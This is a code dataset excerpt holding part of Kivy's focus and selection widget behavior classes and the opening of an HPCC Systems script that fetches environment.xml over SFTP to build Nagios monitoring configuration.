super(DragBehavior, self).on_touch_up(touch)
return self._get_uid() in touch.ud
def _do_touch_up(self, touch, *largs):
super(DragBehavior, self).on_touch_up(touch)
# don't forget about grab event!
for x in touch.grab_list[:]:
touch.grab_list.remove(x)
x = x()
if not x:
continue
touch.grab_current = x
super(DragBehavior, self).on_touch_up(touch)
touch.grab_current = None
def _change_touch_mode(self, *largs):
if not self._drag_touch:
return
uid = self._get_uid()
touch = self._drag_touch
ud = touch.ud[uid]
if ud['mode'] != 'unknown':
return
touch.ungrab(self)
self._drag_touch = None
super(DragBehavior, self).on_touch_down(touch)
return
class FocusBehavior(object):
'''Implements keyboard focus behavior. When combined with other
FocusBehavior widgets it allows one to cycle focus among them by pressing
tab. In addition, upon gaining focus the instance will automatically
receive keyboard input.
Focus, very different then selection, is intimately tied with the keyboard;
each keyboard can focus on zero or one widgets, and each widget can only
have the focus of one keyboard. However, multiple keyboards can focus
simultaneously on different widgets. When escape is hit, the widget having
the focus of that keyboard will de-focus.
In essence, focus is implemented as a doubly linked list, where each
node holds a (weak) reference to the instance before it and after it,
as visualized when cycling through the nodes using tab (forward) or
shift+tab (backward). If previous or next widget is not specified,
:attr:`focus_next` and :attr:`focus_previous` defaults to `None`,
which means that the children list and parents are walked to find
the next focusable widget, unless :attr:`focus_next` or
:attr:`focus_previous` is set to the `StopIteration` class, in which case
focus stops there.
For example, to cycle focus between :class:`~kivy.uix.button.Button`
elements of a :class:`~kivy.uix.gridlayout.GridLayout`::
class FocusButton(FocusBehavior, Button):
pass
grid = GridLayout(cols=4)
for i in range(40):
grid.add_widget(FocusButton(text=str(i)))
# clicking on a widget will activate focus, and tab can now be used
# to cycle through
.. versionadded:: 1.9.0
.. warning::
This code is still experimental, and its API is subject to change in a
future version.
'''
_requested_keyboard = False
_keyboard = ObjectProperty(None, allownone=True)
_keyboards = {}
ignored_touch = []
'''A list of touches that should not be used to defocus. After on_touch_up,
every touch that is not in :attr:`ignored_touch` will defocus all the
focused widgets, if, the config keyboard mode is not multi. Touches on
focusable widgets that were used to focus are automatically added here.
Example usage::
class Unfocusable(Widget):
def on_touch_down(self, touch):
if self.collide_point(*touch.pos):
FocusBehavior.ignored_touch.append(touch)
Notice that you need to access this as class, not instance variable.
'''
def _set_keyboard(self, value):
focus = self.focus
keyboard = self._keyboard
keyboards = FocusBehavior._keyboards
if keyboard:
self.focus = False # this'll unbind
if self._keyboard: # remove assigned keyboard from dict
del keyboards[keyboard]
if value and not value in keyboards:
keyboards[value] = None
self._keyboard = value
self.focus = focus
def _get_keyboard(self):
return self._keyboard
keyboard = AliasProperty(_get_keyboard, _set_keyboard,
bind=('_keyboard', ))
'''The keyboard to bind, or bound to the widget when focused.
When None, a keyboard is requested and released whenever the widget comes
into and out of focus. If not None, it must be a keyboard, which gets
bound and unbound from the widget whenever it's in or out of focus. It is
useful only when more than one keyboard is available, so it is recommended
to be set to None when only one keyboard is available
If more than one keyboard is available, whenever an instance get focused
a new keyboard will be requested if None. Unless, the other instances lose
focus (e.g. if tab was used), a new keyboard will appear. When this is
undesired, the keyboard property can be used. For example, if there are
two users with two keyboards, then each keyboard can be assigned to
different groups of instances of FocusBehavior, ensuring that within
each group, only one FocusBehavior will have focus, and will receive input
from the correct keyboard. see `keyboard_mode` in :mod:`~kivy.config` for
information on the keyboard modes.
:attr:`keyboard` is a :class:`~kivy.properties.AliasProperty`, defaults to
None.
.. note::
When Config's `keyboard_mode` is multi, each new touch is considered
a touch by a different user and will focus (if clicked on a
focusable) with a new keyboard. Already focused elements will not lose
their focus (even if clicked on a unfocusable).
.. note:
If the keyboard property is set, that keyboard will be used when the
instance gets focused. If widgets with different keyboards are linked
through :attr:`focus_next` and :attr:`focus_previous`, then as they are
tabbed through, different keyboards will become active. Therefore,
typically it's undesirable to link instances which are assigned
different keyboards.
.. note:
When an instance has focus, setting keyboard to None will remove the
current keyboard, but will then try to get a keyboard back. It is
better to set :attr:`focus` to False.
.. warning:
When assigning a keyboard, the keyboard must not be released while
it is still assigned to an instance. Similarly, the keyboard created
by the instance on focus and assigned to :attr:`keyboard` if None,
will be released by the instance when the instance loses focus.
Therefore, it is not safe to assign this keyboard to another instance's
:attr:`keyboard`.
'''
is_focusable = BooleanProperty(_is_desktop)
'''Whether the instance can become focused. If focused, it'll lose focus
when set to False.
:attr:`is_focusable` is a :class:`~kivy.properties.BooleanProperty`,
defaults to True on a desktop (i.e. desktop is True in
:mod:`~kivy.config`), False otherwise.
'''
focus = BooleanProperty(False)
'''Whether the instance currently has focus.
Setting it to True, will bind to and/or request the keyboard, and input
will be forwarded to the instance. Setting it to False, will unbind
and/or release the keyboard. For a given keyboard, only one widget can
have its focus, so focusing one will automatically unfocus the other
instance holding its focus.
:attr:`focus` is a :class:`~kivy.properties.BooleanProperty`, defaults to
False.
'''
focused = focus
'''An alias of :attr:`focus`.
:attr:`focused` is a :class:`~kivy.properties.BooleanProperty`, defaults to
False.
.. warning::
:attr:`focused` is an alias of :attr:`focus` and will be removed in
2.0.0.
'''
def _set_on_focus_next(self, instance, value):
''' If changing code, ensure following code is not infinite loop:
widget.focus_next = widget
widget.focus_previous = widget
widget.focus_previous = widget2
'''
next = self._old_focus_next
if next is value: # prevent infinite loop
return
if isinstance(next, FocusBehavior):
next.focus_previous = None
self._old_focus_next = value
if value is None or value is StopIteration:
return
if not isinstance(value, FocusBehavior):
raise ValueError('focus_next accepts only objects based'
' on FocusBehavior, or the StopIteration class.')
value.focus_previous = self
focus_next = ObjectProperty(None, allownone=True)
'''The :class:`FocusBehavior` instance to acquire focus when
tab is pressed when this instance has focus, if not `None` or
`'StopIteration'`.
When tab is pressed, focus cycles through all the :class:`FocusBehavior`
widgets that are linked through :attr:`focus_next` and are focusable. If
:attr:`focus_next` is `None`, it instead walks the children lists to find
the next focusable widget. Finally, if :attr:`focus_next` is
the `StopIteration` class, focus won't move forward, but end here.
.. note:
Setting :attr:`focus_next` automatically sets :attr:`focus_previous`
of the other instance to point to this instance, if not None or
`StopIteration`. Similarly, if it wasn't None or `StopIteration`, it
also sets the :attr:`focus_previous` property of the instance
previously in :attr:`focus_next` to `None`. Therefore, it is only
required to set one side of the :attr:`focus_previous`,
:attr:`focus_next`, links since the other side will be set
automatically.
:attr:`focus_next` is a :class:`~kivy.properties.ObjectProperty`, defaults
to `None`.
'''
def _set_on_focus_previous(self, instance, value):
prev = self._old_focus_previous
if prev is value:
return
if isinstance(prev, FocusBehavior):
prev.focus_next = None
self._old_focus_previous = value
if value is None or value is StopIteration:
return
if not isinstance(value, FocusBehavior):
raise ValueError('focus_previous accepts only objects based'
' on FocusBehavior, or the StopIteration class.')
value.focus_next = self
focus_previous = ObjectProperty(None, allownone=True)
'''The :class:`FocusBehavior` instance to acquire focus when
shift+tab is pressed on this instance, if not None or `StopIteration`.
When shift+tab is pressed, focus cycles through all the
:class:`FocusBehavior` widgets that are linked through
:attr:`focus_previous` and are focusable. If :attr:`focus_previous` is
`None', it instead walks the children tree to find the
previous focusable widget. Finally, if :attr:`focus_previous` is the
`StopIteration` class, focus won't move backward, but end here.
.. note:
Setting :attr:`focus_previous` automatically sets :attr:`focus_next`
of the other instance to point to this instance, if not None or
`StopIteration`. Similarly, if it wasn't None or `StopIteration`, it
also sets the :attr:`focus_next` property of the instance previously in
:attr:`focus_previous` to `None`. Therefore, it is only required
to set one side of the :attr:`focus_previous`, :attr:`focus_next`,
links since the other side will be set automatically.
:attr:`focus_previous` is a :class:`~kivy.properties.ObjectProperty`,
defaults to `None`.
'''
keyboard_mode = OptionProperty('auto', options=('auto', 'managed'))
'''How the keyboard visibility should be managed (auto will have standard
behaviour to show/hide on focus, managed requires setting keyboard_visible
manually, or calling the helper functions ``show_keyboard()``
and ``hide_keyboard()``.
:attr:`keyboard_mode` is an :class:`~kivy.properties.OptionsProperty` and
defaults to 'auto'. Can be one of 'auto' or 'managed'.
'''
input_type = OptionProperty('text', options=('text', 'number', 'url',
'mail', 'datetime', 'tel',
'address'))
'''The kind of input keyboard to request.
.. versionadded:: 1.8.0
:attr:`input_type` is an :class:`~kivy.properties.OptionsProperty` and
defaults to 'text'. Can be one of 'text', 'number', 'url', 'mail',
'datetime', 'tel', 'address'.
'''
unfocus_on_touch = BooleanProperty(_keyboard_mode not in
('multi', 'systemandmulti'))
'''Whether a instance should lose focus when clicked outside the instance.
When a user clicks on a widget that is focus aware and shares the same
keyboard as the this widget (which in the case of only one keyboard, are
all focus aware widgets), then as the other widgets gains focus, this
widget loses focus. In addition to that, if this property is `True`,
clicking on any widget other than this widget, will remove focus form this
widget.
:attr:`unfocus_on_touch` is a :class:`~kivy.properties.BooleanProperty`,
defaults to `False` if the `keyboard_mode` in :attr:`~kivy.config.Config`
is `'multi'` or `'systemandmulti'`, otherwise it defaults to `True`.
'''
def __init__(self, **kwargs):
self._old_focus_next = None
self._old_focus_previous = None
super(FocusBehavior, self).__init__(**kwargs)
self._keyboard_mode = _keyboard_mode
fbind = self.fbind
fbind('focus', self._on_focus)
fbind('disabled', self._on_focusable)
fbind('is_focusable', self._on_focusable)
fbind('focus_next', self._set_on_focus_next)
fbind('focus_previous', self._set_on_focus_previous)
def _on_focusable(self, instance, value):
if self.disabled or not self.is_focusable:
self.focus = False
def _on_focus(self, instance, value, *largs):
if self.keyboard_mode == 'auto':
if value:
self._bind_keyboard()
else:
self._unbind_keyboard()
def _ensure_keyboard(self):
if self._keyboard is None:
self._requested_keyboard = True
keyboard = self._keyboard =\
EventLoop.window.request_keyboard(
self._keyboard_released, self, input_type=self.input_type)
keyboards = FocusBehavior._keyboards
if keyboard not in keyboards:
keyboards[keyboard] = None
def _bind_keyboard(self):
self._ensure_keyboard()
keyboard = self._keyboard
if not keyboard or self.disabled or not self.is_focusable:
self.focus = False
return
keyboards = FocusBehavior._keyboards
old_focus = keyboards[keyboard] # keyboard should be in dict
if old_focus:
old_focus.focus = False
# keyboard shouldn't have been released here, see keyboard warning
keyboards[keyboard] = self
keyboard.bind(on_key_down=self.keyboard_on_key_down,
on_key_up=self.keyboard_on_key_up,
on_textinput=self.keyboard_on_textinput)
def _unbind_keyboard(self):
keyboard = self._keyboard
if keyboard:
keyboard.unbind(on_key_down=self.keyboard_on_key_down,
on_key_up=self.keyboard_on_key_up,
on_textinput=self.keyboard_on_textinput)
if self._requested_keyboard:
keyboard.release()
self._keyboard = None
self._requested_keyboard = False
del FocusBehavior._keyboards[keyboard]
else:
FocusBehavior._keyboards[keyboard] = None
def keyboard_on_textinput(self, window, text):
pass
def _keyboard_released(self):
self.focus = False
def on_touch_down(self, touch):
if not self.collide_point(*touch.pos):
return
if (not self.disabled and self.is_focusable and
('button' not in touch.profile or
not touch.button.startswith('scroll'))):
self.focus = True
FocusBehavior.ignored_touch.append(touch)
return super(FocusBehavior, self).on_touch_down(touch)
@staticmethod
def _handle_post_on_touch_up(touch):
''' Called by window after each touch has finished.
'''
touches = FocusBehavior.ignored_touch
if touch in touches:
touches.remove(touch)
return
for focusable in list(FocusBehavior._keyboards.values()):
if focusable is None or not focusable.unfocus_on_touch:
continue
focusable.focus = False
def _get_focus_next(self, focus_dir):
current = self
walk_tree = 'walk' if focus_dir is 'focus_next' else 'walk_reverse'
while 1:
# if we hit a focusable, walk through focus_xxx
while getattr(current, focus_dir) is not None:
current = getattr(current, focus_dir)
if current is self or current is StopIteration:
return None # make sure we don't loop forever
if current.is_focusable and not current.disabled:
return current
# hit unfocusable, walk widget tree
itr = getattr(current, walk_tree)(loopback=True)
if focus_dir is 'focus_next':
next(itr) # current is returned first when walking forward
for current in itr:
if isinstance(current, FocusBehavior):
break
# why did we stop
if isinstance(current, FocusBehavior):
if current is self:
return None
if current.is_focusable and not current.disabled:
return current
else:
return None
def keyboard_on_key_down(self, window, keycode, text, modifiers):
'''The method bound to the keyboard when the instance has focus.
When the instance becomes focused, this method is bound to the
keyboard and will be called for every input press. The parameters are
the same as :meth:`kivy.core.window.WindowBase.on_key_down`.
When overwriting the method in the derived widget, super should be
called to enable tab cycling. If the derived widget wishes to use tab
for its own purposes, it can call super at the end after it is done if
it didn't consume tab.
Similar to other keyboard functions, it should return True if the
key was consumed.
'''
if keycode[1] == 'tab': # deal with cycle
if ['shift'] == modifiers:
next = self._get_focus_next('focus_previous')
else:
next = self._get_focus_next('focus_next')
if next:
self.focus = False
next.focus = True
return True
return False
def keyboard_on_key_up(self, window, keycode):
'''The method bound to the keyboard when the instance has focus.
When the instance becomes focused, this method is bound to the
keyboard and will be called for every input release. The parameters are
the same as :meth:`kivy.core.window.WindowBase.on_key_up`.
When overwriting the method in the derived widget, super should be
called to enable de-focusing on escape. If the derived widget wishes
to use escape for its own purposes, it can call super at the end after
it is done if it didn't consume escape.
See :meth:`on_key_down`
'''
if keycode[1] == 'escape':
self.focus = False
return True
return False
def show_keyboard(self):
'''
Convenience function to show the keyboard in managed mode.
'''
if self.keyboard_mode == 'managed':
self._bind_keyboard()
def hide_keyboard(self):
'''
Convenience function to hide the keyboard in managed mode.
'''
if self.keyboard_mode == 'managed':
self._unbind_keyboard()
class CompoundSelectionBehavior(object):
'''Selection behavior implements the logic behind keyboard and touch
selection of selectable widgets managed by the derived widget.
For example, it could be combined with a
:class:`~kivy.uix.gridlayout.GridLayout` to add selection to the layout.
At its core, it keeps a dynamic list of widgets that can be selected.
Then, as the touches and keyboard input are passed in, it selects one or
more of the widgets based on these inputs. For example, it uses the mouse
scroll and keyboard up/down buttons to scroll through the list of widgets.
Multiselection can also be achieved using the keyboard shift and ctrl keys.
Finally, in addition to the up/down type keyboard inputs, it can also
accepts letters from the kayboard to be used to select nodes with
associated strings that start with those letters, similar to how files
are selected by a file browser.
When the controller needs to select a node it calls :meth:`select_node` and
:meth:`deselect_node`. Therefore, they must be overwritten in order affect
the selected nodes. By default, the class doesn't listen to keyboard and
touch events, therefore, the derived widget must call
:meth:`select_with_touch`, :meth:`select_with_key_down`, and
:meth:`select_with_key_up` on events that it wants to pass on for selection
purposes.
For example, to add selection to a grid layout which will contain
:class:`~kivy.uix.Button` widgets::
class SelectableGrid(CompoundSelectionBehavior, GridLayout):
def __init__(self, **kwargs):
super(CompoundSelectionBehavior, self).__init__(**kwargs)
keyboard = Window.request_keyboard(None, self)
keyboard.bind(on_key_down=self.select_with_key_down,
on_key_up=self.select_with_key_up)
def select_node(self, node):
node.background_color = (1, 0, 0, 1)
return super(CompoundSelectionBehavior, self).select_node(node)
def deselect_node(self, node):
node.background_color = (1, 1, 1, 1)
super(CompoundSelectionBehavior, self).deselect_node(node)
Then, for each button added to the layout, bind on_touch_down of the button
to :meth:`select_with_touch` to pass on the touch events.
.. versionadded:: 1.9.0
.. warning::
This code is still experimental, and its API is subject to change in a
future version.
'''
selected_nodes = ListProperty([])
'''The list of selected nodes.
.. note:
Multiple nodes can be selected right after another using e.g. the
keyboard, so when listening to :attr:`selected_nodes` one should be
aware of this.
:attr:`selected_nodes` is a :class:`~kivy.properties.ListProperty` and
defaults to the empty list, []. It is read-only and should not be modified.
'''
touch_multiselect = BooleanProperty(False)
'''A special touch mode which determines whether touch events, as
processed with :meth:`select_with_touch`, will add to the selection the
currently touched node, or if it will clear the selection before adding the
node. This allows the selection of multiple nodes by simply touching them.
This is different than :attr:`multiselect`, because when this is True
simply touching an unselected node will select it, even if e.g. ctrl is not
pressed. If this is False, however, ctrl is required to be held in order to
add to selection when :attr:`multiselect` is True.
.. note::
:attr:`multiselect`, when False, will disable
:attr:`touch_multiselect`.
:attr:`touch_multiselect` is a :class:`~kivy.properties.BooleanProperty`,
defaults to False.
'''
multiselect = BooleanProperty(False)
'''Determines whether multiple nodes can be selected. If enabled, keyboard
shift and ctrl selection, optionally combined with touch, for example, will
be able to select multiple widgets in the normally expected manner.
This dominates :attr:`touch_multiselect` when False.
:attr:`multiselect` is a :class:`~kivy.properties.BooleanProperty`
, defaults to False.
'''
keyboard_select = BooleanProperty(True)
''' Whether the keybaord can be used for selection. If False, keyboard
inputs will be ignored.
:attr:`keyboard_select` is a :class:`~kivy.properties.BooleanProperty`
, defaults to True.
'''
page_count = NumericProperty(10)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when pageup (or pagedown) is
pressed.
:attr:`page_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 10.
'''
up_count = NumericProperty(1)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when the up (or down) arrow on the
keyboard is pressed.
:attr:`up_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 1.
'''
right_count = NumericProperty(1)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when the right (or left) arrow on
the keyboard is pressed.
:attr:`right_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 1.
'''
scroll_count = NumericProperty(0)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when the mouse scroll wheel is
scrolled.
:attr:`right_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 0.
'''
_anchor = None # the last anchor node selected (e.g. shift relative node)
# the idx may be out of sync
_anchor_idx = 0 # cache indexs in case list hasn't changed
_last_selected_node = None # the absolute last node selected
_last_node_idx = 0
_ctrl_down = False # if it's pressed - for e.g. shift selection
_shift_down = False
# holds str used to find node, e.g. if word is typed. passed to goto_node
_word_filter = ''
_last_key_time = 0 # time since last press, for finding whole strs in node
_printable = set(string.printable)
_key_list = [] # keys that are already pressed, to not press continuously
_offset_counts = {} # cache of counts for faster access
def __init__(self, **kwargs):
super(CompoundSelectionBehavior, self).__init__(**kwargs)
def ensure_single_select(*l):
if (not self.multiselect) and len(self.selected_nodes) > 1:
self.clear_selection()
update_counts = self._update_counts
update_counts()
fbind = self.fbind
fbind('multiselect', ensure_single_select)
fbind('page_count', update_counts)
fbind('up_count', update_counts)
fbind('right_count', update_counts)
fbind('scroll_count', update_counts)
def select_with_touch(self, node, touch=None):
'''(internal) Processes a touch on the node. This should be called by
the derived widget when a node is touched and is to be used for
selection. Depending on the keyboard keys pressed and the
configuration, it could select or deslect this and other nodes in the
selectable nodes list, :meth:`get_selectable_nodes`.
:Parameters:
`node`
The node that recieved the touch. Can be None for a scroll
type touch.
`touch`
Optionally, the touch. Defaults to None.
:Returns:
bool, True if the touch was used, False otherwise.
'''
multi = self.multiselect
multiselect = multi and (self._ctrl_down or self.touch_multiselect)
range_select = multi and self._shift_down
if touch and 'button' in touch.profile and touch.button in\
('scrollup', 'scrolldown', 'scrollleft', 'scrollright'):
node_src, idx_src = self._reslove_last_node()
node, idx = self.goto_node(touch.button, node_src, idx_src)
if node == node_src:
return False
if range_select:
self._select_range(multiselect, True, node, idx)
else:
if not multiselect:
self.clear_selection()
self.select_node(node)
return True
if node is None:
return False
if (node in self.selected_nodes and (not range_select)): # selected
if multiselect:
self.deselect_node(node)
else:
self.clear_selection()
self.select_node(node)
elif range_select:
# keep anchor only if not multislect (ctrl-type selection)
self._select_range(multiselect, not multiselect, node, 0)
else: # it's not selected at this point
if not multiselect:
self.clear_selection()
self.select_node(node)
return True
def select_with_key_down(self, keyboard, scancode, codepoint, modifiers,
**kwargs):
'''Processes a key press. This is called when a key press is to be used
for selection. Depending on the keyboard keys pressed and the
configuration, it could select or deslect nodes or node ranges
from the selectable nodes list, :meth:`get_selectable_nodes`.
The parameters are such that it could be bound directly to the
on_key_down event of a keyboard. Therefore, it is safe to be called
repeatedly when the key is held down as is done by the keyboard.
:Returns:
bool, True if the keypress was used, False otherwise.
'''
if not self.keyboard_select:
return False
keys = self._key_list
multi = self.multiselect
node_src, idx_src = self._reslove_last_node()
if scancode[1] == 'shift':
self._shift_down = True
elif scancode[1] in ('ctrl', 'lctrl', 'rctrl'):
self._ctrl_down = True
elif (multi and 'ctrl' in modifiers and scancode[1] in ('a', 'A')
and scancode[1] not in keys):
sister_nodes = self.get_selectable_nodes()
select = self.select_node
for node in sister_nodes:
select(node)
keys.append(scancode[1])
else:
if scancode[1] in self._printable:
if time() - self._last_key_time <= 1.:
self._word_filter += scancode[1]
else:
self._word_filter = scancode[1]
self._last_key_time = time()
node, idx = self.goto_node(self._word_filter, node_src,
idx_src)
else:
node, idx = self.goto_node(scancode[1], node_src, idx_src)
if node == node_src:
return False
multiselect = multi and 'ctrl' in modifiers
if multi and 'shift' in modifiers:
self._select_range(multiselect, True, node, idx)
else:
if not multiselect:
self.clear_selection()
self.select_node(node)
return True
return False
def select_with_key_up(self, keyboard, scancode, **kwargs):
'''(internal) Processes a key release. This must be called by the
derived widget when a key that :meth:`select_with_key_down` returned
True is released.
The parameters are such that it could be bound directly to the
on_key_up event of a keyboard.
:Returns:
bool, True if the key release was used, False otherwise.
'''
if scancode[1] == 'shift':
self._shift_down = False
elif scancode[1] in ('ctrl', 'lctrl', 'rctrl'):
self._ctrl_down = False
else:
try:
self._key_list.remove(scancode[1])
return True
except ValueError:
return False
return True
def _update_counts(self, *largs):
# doesn't invert indices here
pc = self.page_count
uc = self.up_count
rc = self.right_count
sc = self.scroll_count
self._offset_counts = {'pageup': -pc, 'pagedown': pc, 'up': -uc,
'down': uc, 'right': rc, 'left': -rc, 'scrollup': sc,
'scrolldown': -sc, 'scrollright': -sc, 'scrollleft': sc}
def _reslove_last_node(self):
# for offset selection, we have a anchor, and we select everything
# between anchor and added offset relative to last node
sister_nodes = self.get_selectable_nodes()
if not len(sister_nodes):
return None, 0
last_node = self._last_selected_node
last_idx = self._last_node_idx
end = len(sister_nodes) - 1
if last_node is None:
last_node = self._anchor
last_idx = self._anchor_idx
if last_node is None:
return sister_nodes[end], end
if last_idx > end or sister_nodes[last_idx] != last_node:
try:
return last_node, sister_nodes.index(last_node)
except ValueError:
return sister_nodes[end], end
return last_node, last_idx
def _select_range(self, multiselect, keep_anchor, node, idx):
'''Selects a range between self._anchor and node or idx.
If multiselect, it'll add to selection, otherwise it will unselect
everything before selecting the range. This is only called if
self.multiselect is True.
If keep anchor is False, the anchor is moved to node. This should
always be True of keyboard selection.
'''
select = self.select_node
sister_nodes = self.get_selectable_nodes()
end = len(sister_nodes) - 1
last_node = self._anchor
last_idx = self._anchor_idx
if last_node is None:
last_idx = end
last_node = sister_nodes[end]
else:
if last_idx > end or sister_nodes[last_idx] != last_node:
try:
last_idx = sister_nodes.index(last_node)
except ValueError:
# list changed - cannot do select across them
return
if idx > end or sister_nodes[idx] != node:
try: # just in case
idx = sister_nodes.index(node)
except ValueError:
return
if last_idx > idx:
last_idx, idx = idx, last_idx
if not multiselect:
self.clear_selection()
for item in sister_nodes[last_idx:idx + 1]:
select(item)
if keep_anchor:
self._anchor = last_node
self._anchor_idx = last_idx
else:
self._anchor = node # in case idx was reversed, reset
self._anchor_idx = idx
self._last_selected_node = node
self._last_node_idx = idx
def clear_selection(self):
''' Deselects all the currently selected nodes.
'''
# keep the anchor and last selected node
deselect = self.deselect_node
nodes = self.selected_nodes
# empty beforehand so lookup in deselect will be fast
self.selected_nodes = []
for node in nodes:
deselect(node)
def get_selectable_nodes(self):
'''(internal) Returns a list of the nodes that can be selected. It can
be overwritten by the derived widget to return the correct list.
This list is used to determine which nodes to select with group
selection. E.g. the last element in the list will be selected when
home is pressed, pagedown will move (or add to, if shift is held) the
selection from the current position by negative :attr:`page_count`
nodes starting from the position of the currently selected node in
this list and so on. Still, nodes can be selected even if they are not
in this list.
.. note::
It is safe to dynamically change this list including removing,
adding, or re-arranging its elements. Nodes can be selected even
if they are not on this list. And selected nodes removed from the
list will remain selected until :meth:`deselect_node` is called.
.. warning::
Layouts display their children in the reverse order. That is, the
contents of :attr:`~kivy.uix.widget.Widget.children` is displayed
form right to left, bottom to top. Therefore, internally, the
indices of the elements returned by this function is reversed to
make it work by default for most layouts so that the final result
is that e.g. home, although it will select the last element on this
list, visually it'll select the first element when counting from
top to bottom and left to right. If this behavior is not desired,
a reversed list should be returned instead.
Defaults to returning :attr:`~kivy.uix.widget.Widget.children`.
'''
return self.children
def goto_node(self, key, last_node, last_node_idx):
'''(internal) Used by the controller to get the node at the position
indicated by key. The key can be keyboard inputs, e.g. pageup,
or scroll inputs from the mouse scroll wheel, e.g. scrollup.
Last node is the last node selected and is used to find the resulting
node. For example, if the key is up, the returned node is one node
up from the last node.
It can be overwritten by the derived widget.
:Parameters:
`key`
str, the string used to find the desired node. It can be any
of the keyboard keys, as well as the mouse scrollup,
scrolldown, scrollright, and scrollleft strings. If letters
are typed in quick succession, the letters will be combined
before it's passed in as key and can be used to find nodes that
have an associated string that starts with those letters.
`last_node`
The last node that was selected.
`last_node_idx`
The cached index of the last node selected in the
:meth:`get_selectable_nodes` list. If the list hasn't changed
it saves having to look up the index of `last_node` in that
list.
:Returns:
tuple, the node targeted by key and its index in the
:meth:`get_selectable_nodes` list. Returning
`(last_node, last_node_idx)` indicates a node wasn't found.
'''
sister_nodes = self.get_selectable_nodes()
end = len(sister_nodes) - 1
counts = self._offset_counts
if end == -1:
return last_node, last_node_idx
if last_node_idx > end or sister_nodes[last_node_idx] != last_node:
try: # just in case
last_node_idx = sister_nodes.index(last_node)
except ValueError:
return last_node, last_node_idx
try:
idx = max(min(-counts[key] + last_node_idx, end), 0)
return sister_nodes[idx], idx
except KeyError:
pass
if key == 'home':
return sister_nodes[end], end
elif key == 'end':
return sister_nodes[0], 0
else:
return last_node, last_node_idx
def select_node(self, node):
''' Selects a node.
It is called by the controller when it selects a node and can be
called from the outside to select a node directly. The derived widget
should overwrite this method and change the node to its selected state
when this is called
:Parameters:
`node`
The node to be selected.
:Returns:
bool, True if the node was selected, False otherwise.
.. warning::
This method must be called by the derived widget using super if it
is overwritten.
'''
nodes = self.selected_nodes
if (not self.multiselect) and len(nodes):
self.clear_selection()
if node not in nodes:
nodes.append(node)
self._anchor = node
self._last_selected_node = node
return True
def deselect_node(self, node):
''' Deselects a possibly selected node.
It is called by the controller when it deselects a node and can also
be called from the outside to deselect a node directly. The derived
widget should overwrite this method and change the node to its
unselected state when this is called
:Parameters:
`node`
The node to be deselected.
.. warning::
This method must be called by the derived widget using super if it
is overwritten.
'''
try:
self.selected_nodes.remove(node)
except ValueError:
pass
|
mit
| 289,419,205,945,449,800
| 36.926099
| 79
| 0.616238
| false
| 4.279543
| false
| false
| false
|
hpcc-systems/nagios-monitoring
|
hpcc-nagios-tools/hpcc_centralized_nagios.py
|
1
|
24447
|
#!/usr/bin/env python3
##############################################################################
# HPCC SYSTEMS software Copyright (C) 2015 HPCC Systems.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import lxml.etree as ET
import subprocess
import paramiko
import getpass
import sys
import os
Environment = input('Enter Environment Name > ')
Address = input('Enter IP > ')
ProdOrNot = input(
'Please specify if this environment is production by typing prod or if it is a non-production by typing non-prod > ')
xxx = getpass.getpass()
user = input('Enter username > ')
xml_local = '/tmp/environment.xml'
xml_remote = '/etc/HPCCSystems/environment.xml'
if ProdOrNot == 'prod':
HostDefinition = 'generic-prod-hpcc'
ServiceDefinition = 'hpcc-prod-service'
elif ProdOrNot == 'non-prod':
HostDefinition = 'generic-nonprod-hpcc'
ServiceDefinition = 'hpcc-nonprod-service'
else:
print('Invalid Option')
sys.exit(1)
class XML():
def __init__(self):
self.xml = self
def getXML(self):
host = paramiko.Transport((Address, 22))
host.connect(username=user, password=xxx)
sftp = paramiko.SFTPClient.from_transport(host)
sftp.get(xml_remote, xml_local)
class XMLParser():
def __init__(self):
self.parsing = self
def hpcc_components(self, component_name):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
cluster = []
for i in doc_root.findall('.//{}Process/Instance'.format(component_name)):
ip = i.attrib['netAddress']
cluster.append(ip)
return cluster
def hpcc_master_components(self, component_name):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
ip_port = []
for i in doc_root.findall('.//{}ServerProcess/Instance'.format(component_name)):
master_component = i.attrib['netAddress']
ip_port.append(master_component)
for i in doc_root.findall('.//{}ServerProcess/Instance'.format(component_name)):
port = i.attrib['port']
ip_port.append(port)
return ip_port
def Esp(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
ip_port = {}
ports = []
for i in doc_root.findall('.//EspProcess/Instance'):
ip = i.attrib['netAddress']
for i in doc_root.findall('.//EspProcess/EspBinding'):
port = i.attrib['port']
ports.append(port)
ip_port[ip] = ports
return ip_port
def Roxie(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
Roxies = []
for roxie in doc_root.findall('.//RoxieServerProcess'):
Roxie = roxie.attrib['computer']
Roxies.append(Roxie)
ip_addr = {}
for node in doc_root.findall('.//Hardware/Computer'):
Machine = node.attrib['name']
IP = node.attrib['netAddress']
ip_addr[Machine] = IP
RoxieSlaves = []
for key in ip_addr:
if key not in Roxies:
continue
elif key in Roxies:
RoxieSlaves.append(ip_addr[key])
return RoxieSlaves
def ThorMaster(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
Thors = []
for i in doc_root.findall('.//ThorMasterProcess'):
Thor = i.attrib['computer']
Thors.append(Thor)
d = {}
for i in doc_root.findall('.//Hardware/Computer'):
Machine = i.attrib['name']
IP = i.attrib['netAddress']
d[Machine] = IP
masterport = {}
machine = []
for i in doc_root.findall('.//ThorCluster'):
try:
Computer = i.attrib['computer']
Port = i.attrib['masterport']
if Computer in d:
machine.append(Port)
except KeyError:
continue
masterport.setdefault(d[Computer], [])
masterport[d[Computer]].append(machine)
machine = []
ThorMasters = []
for i in d:
if i not in Thors:
continue
elif i in Thors:
